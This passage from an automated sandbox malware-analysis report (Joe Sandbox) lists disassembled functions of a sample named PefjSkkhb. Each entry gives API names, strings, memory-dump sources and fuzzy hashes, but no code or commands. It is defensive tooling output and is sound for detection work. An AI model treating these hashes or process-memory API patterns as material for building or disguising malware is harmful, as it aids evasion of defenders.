                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56D1C072B18B4681EB40EB26D4902AD7B70FB80B88F845132EE4EA7B65DF3ED144C740
                                                                                                                                                                                                                    Function 00007FF656CF0040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                    • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                                                                                                                    • Instruction ID: b8e3ba45fd3d9eb52d918e394b430904e58ba20e20d538ff985b6aec42e05e14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F817AF2F0820286FB654F25966437DB6B0AF11B88F1C8035DA0AF7681DE6FE960D211
                                                                                                                                                                                                                    Function 00007FF656CDB1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: $*
                                                                                                                                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                    • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                                                                                                                    • Instruction ID: d4e67c9a628083e9763c8a11831e73b2744bdeb851658e19cdd981cef052fc45
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A6153F298C6C28BE7698F24809537D37B0EB45B18F1C1235D64AE72D9CF2AE441E701
                                                                                                                                                                                                                    Function 00007FF656CE6148 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID: !$acos
                                                                                                                                                                                                                    • API String ID: 1156100317-2870037509
                                                                                                                                                                                                                    • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                                                                                                                                    • Instruction ID: fdc1f6c057f41bf860a42294714ca4763a383ef237fc9521032b93612d134bd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF61EC61D28F8684E223CB755812376A774BFA63D0F158337E95EB5E64DF1DE082C600
                                                                                                                                                                                                                    Function 00007FF656CE6408 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _set_statfp
                                                                                                                                                                                                                    • String ID: !$asin
                                                                                                                                                                                                                    • API String ID: 1156100317-2188059690
                                                                                                                                                                                                                    • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                                                                                                                    • Instruction ID: b83b13c6af694ba2906390ec9d4a44e3b29bb781d761792d4d5f8e6cdf77ed12
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8610D62D28F8685E213CB355812376A774BF963C0F149333E95EB5A65DF2EF082CA00
                                                                                                                                                                                                                    Function 00007FF656D1EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                    • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                                                                                                                                                    • Instruction ID: 31b510b295c36cf166e35877e4c3c14b675829ef95658036bc28701e6dee8d2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D651DF7271868182E720DF52E8809AEBB61FBC8BC4F480631EE4DA7B49DE7DD505CB40
                                                                                                                                                                                                                    Function 00007FF656D2A6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 135850232-3110715001
                                                                                                                                                                                                                    • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                                                                                                                                                    • Instruction ID: b8394fe909c4d4d4af1ad028a10c36f6b19ce6fe94c35afc8daf0dbbf7cf1bb1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D641D332A04A8181EB20DB29D8443AD6760EB84FA0F1E8731DA6DA77D5DF3ED546C700
                                                                                                                                                                                                                    Function 00007FF656CEEAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                    • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                    • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                                                                                                                                                    • Instruction ID: 540da9a11c4f8aabdd30a0d2842997ffef27c6074fc266b121b29673cc5faed1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A41D262B1974282DB608F15E4453AAB7B0FB88BD4F484131EE4E97798DF3DD441C740
                                                                                                                                                                                                                    Function 00007FF656D5B454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                    • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                                                                                                                                    • Instruction ID: 65f64b8d886bef0a49e7076f2b647abd959cbc8498b536079ebbec28658f0115
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74415D32A097C28AE7709B18E444BAA77A1F785764F184335DAA857BD8CF3DD845CF40
                                                                                                                                                                                                                    Function 00007FF656D5AB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateObjectStock
                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                    • API String ID: 2671490118-1439706946
                                                                                                                                                                                                                    • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                                                                                                                                                    • Instruction ID: 1bc65a26c8a39104c8ad8b1607153770e9f3f440637a8c4374ef8cfa76128e42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8416D326086C28BE370CF15E444BAAB7A0FB88790F544735EA9993A99DF3DD485CF40
                                                                                                                                                                                                                    Function 00007FF656D5B798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                    • API String ID: 1752125012-2298589950
                                                                                                                                                                                                                    • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                                                                                                                                    • Instruction ID: 4037c5e85b278d1d04646585aa8dae12754a5078a769213a34b21c330c0cb92a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B931AC32A18B8286EB20CF15E4503AA7760FBC5B95F188736DA8D93B98CF3DD445CB00
                                                                                                                                                                                                                    Function 00007FF656D5A1F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                    • API String ID: 3747482310-2633736733
                                                                                                                                                                                                                    • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                                                                                                                                                    • Instruction ID: 924f7e559a370e21d6b429b294f83f2d3caa64d5f9abdfff7bc87d663efa5ec0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 363136366087C186E7708F16F444A5AB7A1F7887A0F548735EAA953BA8CF3ED481CF00
                                                                                                                                                                                                                    Function 00007FF656D34DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                    • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                                                                                                                                                    • Instruction ID: ca0fb42946752a42ece68a820deffd32a13811a90386beed44b96342d1dec4a2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28318D72608B8685DB10DB16E4801ADB7B1FB89BC0F484631EA8D93B69CF7ED595CB00
                                                                                                                                                                                                                    Function 00007FF656D5B104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                    • API String ID: 1025951953-1010561917
                                                                                                                                                                                                                    • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                                                                                                                                                    • Instruction ID: db75cce0c8f8b1b7a1fc13aa90c4c11b7986e3b0d939dfa30586d0bbbb64e911
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16312872A1878187E760CF15E454B5AB7A1FB89B90F144239EB9893B98CF3DD845CF04
                                                                                                                                                                                                                    Function 00007FF656D1F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                    • API String ID: 2330185562-1110647743
                                                                                                                                                                                                                    • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                                                                                                                    • Instruction ID: a874c827e06cff03e4d5540b514e1b444390a5b18a4793673d7aa79e3b2568e6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E21BF71A08B8291EA14EB12E4402FA6361EB89BC0F484731DE9DA7765CE7DE145C741
                                                                                                                                                                                                                    Function 00007FF656CD8782 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
